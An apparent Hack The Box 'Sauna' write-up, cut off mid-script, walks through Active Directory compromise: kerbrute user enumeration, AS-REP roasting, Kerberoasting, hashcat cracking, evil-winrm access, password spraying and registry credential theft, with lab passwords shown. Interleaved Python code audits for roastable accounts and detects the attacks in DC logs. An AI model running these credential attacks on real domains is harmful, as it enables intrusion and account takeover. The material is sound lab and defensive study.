Sauna-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: username-anarchy, usernames harvested from the website, kerbrute, domain user enumeration, AS-REP roasting, hashcat, a default password stored in a registry value, Kerberoasting, BloodHound, DCSync attack

Reference: hints from the official guided mode

0x01 Getting user access

1. Get the target IP address: 10.10.10.175

2. Find the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.175
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:09 CST
Nmap scan report for 10.10.10.175
Host is up (0.14s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49749/tcp open unknown
49772/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.68 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49677,49749,49772,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49677,49749,49772 -sC -sV --min-rate=10000 10.10.10.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:13 CST
Nmap scan report for 10.10.10.175
Host is up (0.13s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-09 15:09:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49749/tcp open msrpc Microsoft Windows RPC
49772/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1h03m25s
| smb2-time:
| date: 2024-05-09T15:10:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.46 seconds

3. Start with port 80

http://10.10.10.175/

http://10.10.10.175/single.html

Jenny Joy
James Doe
Johnson
Watson

http://10.10.10.175/about.html

Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

http://10.10.10.175/contact.html

4. The website gave us some names; keep them for later. First, add the domain to the local hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.175 EGOTISTICAL-BANK.LOCAL" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.175 EGOTISTICAL-BANK.LOCAL

5. With a few names in hand, we can use the username-anarchy tool to expand each name into the various username formats an organisation might use.

shiyan@InfoSec username-anarchy % ./username-anarchy -i ./name.txt
jenny
jennyjoy
jenny.joy
jennjoy
......
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
......
driver.s
driver.sophie
sd
shiyan@InfoSec username-anarchy %

6. Then use kerbrute to enumerate which of these usernames actually exist in the domain

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 ../list.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 05/10/24 - Ronnie Flathers @ropnop

2024/05/10 02:20:19 > Using KDC(s):
2024/05/10 02:20:19 > 10.10.10.175:88

2024/05/10 02:20:20 > [+] VALID USERNAME: fsmith@egotistical-bank.local
2024/05/10 02:20:20 > Done! Tested 116 usernames (1 valid) in 1.019 seconds

7. Wow, out of all those candidates only this one account exists. Let's check whether it is vulnerable to AS-REP roasting

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetNPUsers -format hashcat -dc-ip 10.10.10.175 -request 'egotistical-bank.local/fsmith' -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0a556391e31d0d84bd6368c3dc76808e$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

8. Now crack the hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 18200 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0a556391e31d0d84bd6368c3dc76808e$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:Thestrokes23

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0a55639...76d1b7
Time.Started.....: Fri May 10 02:26:43 2024 (6 secs)
Time.Estimated...: Fri May 10 02:26:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1842.8 kH/s (0.46ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10537984/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Throy1 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 80%

Started: Fri May 10 02:26:32 2024
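From the defender's side, the two account properties that steps 7 and 14 of this writeup rely on can be audited directly in the directory: the userAccountControl bit that disables Kerberos pre-authentication (what makes fsmith AS-REP-roastable) and a user account carrying an SPN whose service tickets may still be issued with RC4 (what makes HSmith's hash crackable at dictionary speed). The following Python audit is an added example, not code from the writeup or any tool shown in it; the account records are constructed to resemble LDAP attributes, and their userAccountControl and msDS-SupportedEncryptionTypes values are assumptions, not data read from the box.

```python
"""Audit account records for the Kerberos weaknesses used in this box:
pre-authentication disabled (AS-REP roasting) and a user account with an
SPN that can be issued an RC4 service ticket (Kerberoasting).
Added example; the records below are constructed to resemble LDAP
attributes, and their flag values are assumptions, not data from Sauna."""

# userAccountControl bits (Microsoft-documented values)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits
ETYPE_RC4_HMAC = 0x4
ETYPE_AES128 = 0x8
ETYPE_AES256 = 0x10

# Constructed sample: only the attributes the audit needs.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "fsmith",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "hsmith",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
     "servicePrincipalName": ["SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111"],
     "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "svc_sql",            # hypothetical AES-only service account
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/db01.example.local:1433"],
     "msDS-SupportedEncryptionTypes": ETYPE_AES128 | ETYPE_AES256},
    {"sAMAccountName": "SAUNA$",             # machine account: SPNs expected, long random password
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "servicePrincipalName": ["HOST/SAUNA"],
     "msDS-SupportedEncryptionTypes": ETYPE_RC4_HMAC | ETYPE_AES128 | ETYPE_AES256},
    {"sAMAccountName": "old_user",           # hypothetical disabled account: not a live risk
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0},
]


def rc4_possible(supported_etypes):
    """True when the KDC may issue an RC4 (etype 23) ticket for the account.
    An unset attribute (0) is treated as RC4-capable: that is the safe
    assumption, since the domain default has included RC4 on most patch
    levels, and it is what makes the etype-23 hashes in this writeup
    crackable offline at dictionary speed."""
    return supported_etypes == 0 or bool(supported_etypes & ETYPE_RC4_HMAC)


def audit_account(acct):
    """Return the list of findings for one account (empty = nothing to report)."""
    findings = []
    uac = acct["userAccountControl"]
    if uac & UF_ACCOUNTDISABLE:
        return findings                      # disabled accounts cannot be roasted
    is_machine = acct["sAMAccountName"].endswith("$") or bool(uac & UF_WORKSTATION_TRUST_ACCOUNT)
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("asrep-roastable")   # anyone can request a TGT and get crackable material
    if acct["servicePrincipalName"] and not is_machine:
        if rc4_possible(acct["msDS-SupportedEncryptionTypes"]):
            findings.append("kerberoastable-rc4")
        else:
            findings.append("kerberoastable-aes-only")  # still roastable, but far slower to crack
    return findings


def audit(accounts):
    """Map sAMAccountName -> findings for every account that has any."""
    return {a["sAMAccountName"]: f for a in accounts if (f := audit_account(a))}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS).items():
        print(f"{name:12s} {', '.join(findings)}")
```

The fixes the findings map to are the usual ones: clear the "Do not require Kerberos preauthentication" flag, move SPN-bearing user accounts to long random passwords or gMSAs, and set msDS-SupportedEncryptionTypes to AES only so that the etype-23 hashes seen in this writeup are never issued.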

9. Log in to the target with evil-winrm using the cracked credentials

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents>

10. Grab the first flag

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls C:/Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr


*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


Directory: C:\Users\FSmith\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/9/2024 7:45 AM 34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
af42672d722ddf2d3b394aa2be63045e
*Evil-WinRM* PS C:\Users\FSmith\Desktop>

0x02 Getting SYSTEM access

11. First enumerate the current user

*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user fsmith
User name FSmith
Full Name Fergus Smith
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/23/2020 9:45:19 AM
Password expires Never
Password changeable 1/24/2020 9:45:19 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/9/2024 1:28:24 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup

Aliases for \\SAUNA

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop>


*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\FSmith\Desktop>

12. Not much to go on, so run winpeas.exe to enumerate in bulk

*Evil-WinRM* PS C:\Users\FSmith\Desktop> upload /home/kali/Desktop/tools/winPEASx64.exe

Info: Uploading /home/kali/Desktop/tools/winPEASx64.exe to C:\Users\FSmith\Desktop\winPEASx64.exe

Data: 3183272 bytes of 3183272 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winPEASx64.exe

=================================================================================================

Computer Name : SAUNA
User Name : HSmith
User Id : 1103
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/22/2020 10:54:34 PM

=================================================================================================

Computer Name : SAUNA
User Name : svc_loanmgr
User Id : 1108
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/24/2020 4:48:31 PM

=================================================================================================


Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!

13. That turned up a default password and a few active accounts; let's check those accounts

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop>


*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user HSmith
User name HSmith
Full Name Hugo Smith
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/22/2020 10:54:34 PM
Password expires Never
Password changeable 1/23/2020 10:54:34 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop>

14. Their group memberships are ordinary, nothing special there, so let's try Kerberoasting next

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetUserSPNs -request -dc-ip 10.10.10.175 egotistical-bank.local/fsmith:Thestrokes23
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------------- ------ -------- -------------------------- --------- ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 HSmith 2020-01-23 13:54:34.140321 <never>

[-] CCache file is not found. Skipping...
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotistical-bank.local/HSmith*$cf98868809279887e2ad034a9d23cd4a$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

15. Good, we have a hash for another user; crack it as well

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13100 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotistical-bank.local/HSmith*$cf98868809279887e2ad034a9d23cd4a$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:Thestrokes23

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotisti...f3eea4
Time.Started.....: Fri May 10 17:17:04 2024 (4 secs)
Time.Estimated...: Fri May 10 17:17:08 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2482.7 kH/s (0.34ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10537984/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Throy1 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 74%

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Fri May 10 17:17:03 2024
Stopped: Fri May 10 17:17:10 2024
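Both requests in this writeup leave a trace on the domain controller: the AS-REP roast of step 7 is logged as event 4768 (TGT requested) with pre-authentication type 0 and RC4 (0x17, the etype 23 in the `$krb5asrep$23$` hash), and the Kerberoast of step 14 as event 4769 (service ticket requested) with RC4 for a user account's SPN. The following Python detection is an added example, not part of the writeup; the event records are constructed with the field names of the 4768/4769 data sections, and the client IP addresses, the jdoe/svc_sql names and the alert threshold are invented for the example.

```python
"""Detect the Kerberos requests behind steps 7 and 14 in DC security-log
events: 4768 (TGT requested) with pre-auth type 0 and RC4, and 4769
(service ticket requested) with RC4 for a user account's SPN.
Added example, not part of the writeup; the events are constructed with
the field names of the 4768/4769 data sections and invented values."""

from collections import defaultdict

RC4_HMAC = "0x17"      # TicketEncryptionType of etype 23 ($krb5asrep$23$ / $krb5tgs$23$ hashes)
AES256 = "0x12"
NO_PREAUTH = "0"       # PreAuthType 0: TGT issued without pre-authentication
SUCCESS = "0x0"

SAMPLE_EVENTS = [
    # AS-REP roast: TGT for a no-preauth account, RC4, from the (constructed) attacker host
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": RC4_HMAC, "PreAuthType": NO_PREAUTH, "Status": SUCCESS},
    # normal logon: pre-auth with encrypted timestamp (type 2), AES
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "10.10.10.50",
     "TicketEncryptionType": AES256, "PreAuthType": "2", "Status": SUCCESS},
    # Kerberoast: RC4 service tickets for two user-account SPNs from one client
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "IpAddress": "10.10.14.5",
     "ServiceName": "HSmith", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS},
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "IpAddress": "10.10.14.5",
     "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS},
    # benign: AES ticket for a machine account, and an RC4 ticket for krbtgt (TGT renewal)
    {"EventID": 4769, "TargetUserName": "jdoe@EGOTISTICAL-BANK.LOCAL", "IpAddress": "10.10.10.50",
     "ServiceName": "SAUNA$", "TicketEncryptionType": AES256, "Status": SUCCESS},
    {"EventID": 4769, "TargetUserName": "jdoe@EGOTISTICAL-BANK.LOCAL", "IpAddress": "10.10.10.50",
     "ServiceName": "krbtgt", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS},
]


def is_asrep_roast(ev):
    """4768 that handed out a TGT without pre-auth, encrypted with RC4."""
    return (ev["EventID"] == 4768 and ev["Status"] == SUCCESS
            and ev["PreAuthType"] == NO_PREAUTH
            and ev["TicketEncryptionType"] == RC4_HMAC)


def is_rc4_user_service_ticket(ev):
    """4769 with an RC4 ticket for a user account (not a machine account, not krbtgt)."""
    svc = ev.get("ServiceName", "")
    return (ev["EventID"] == 4769 and ev["Status"] == SUCCESS
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect(events, kerberoast_threshold=2):
    """Return alerts: every AS-REP roast, plus a Kerberoast alert for any
    requester that pulled RC4 tickets for >= threshold distinct user SPNs."""
    alerts = []
    rc4_services = defaultdict(set)
    for ev in events:
        if is_asrep_roast(ev):
            alerts.append(("asrep-roast", ev["IpAddress"], ev["TargetUserName"]))
        elif is_rc4_user_service_ticket(ev):
            rc4_services[(ev["IpAddress"], ev["TargetUserName"])].add(ev["ServiceName"])
    for (ip, requester), services in rc4_services.items():
        if len(services) >= kerberoast_threshold:
            alerts.append(("kerberoast", ip, requester, tuple(sorted(services))))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The 4768 rule is precise because pre-auth type 0 only occurs for accounts that have pre-authentication disabled; the 4769 rule needs the threshold (or a baseline of which clients normally request RC4 tickets) because a single legacy application can legitimately request an RC4 service ticket.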

16. Wow, password reuse???? It was that simple and I never even considered it....

17. After checking, neither of those two accounts can log in remotely, so we have to keep enumerating; let's try the bloodhound-python tool

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -u HSmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c all --zip
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 21S
INFO: Compressing output into 20240510175754_bloodhound.zip

18. The AD attack graph shows that we need the password of the svc_loanmgr account, and enumeration is the only way to get it. Then I remembered that winpeas found a default-configured username and password earlier: that username does not exist, but the password can still be sprayed to see whether it fits any account.

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.175 -u ./targetname.txt -p 'Moneymakestheworldgoround!' --continue-on-success
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\HSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
SMB 10.10.10.175 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Administrator:Moneymakestheworldgoround! STATUS_LOGON_FAILURE

19. So the password is correct and it belongs to this user. Below we reproduce the credential-hunting step by hand: there is a default password in the registry, the same one winpeas collected above.

*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ Moneymakestheworldgoround!
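The same Winlogon finding can be checked mechanically on exported `reg query` output, which is useful when reviewing many hosts. The Python parser below is an added example, not part of the writeup or of winpeas; the sample output is constructed in the layout reg.exe prints (key path flush-left, values indented as name, type, data), with an invented user name and password. Secret values are reported by length only so the finding can go into a log.

```python
"""Parse `reg query ... /s` output and flag plaintext AutoLogon
credentials under the Winlogon key (the finding in steps 12 and 19).
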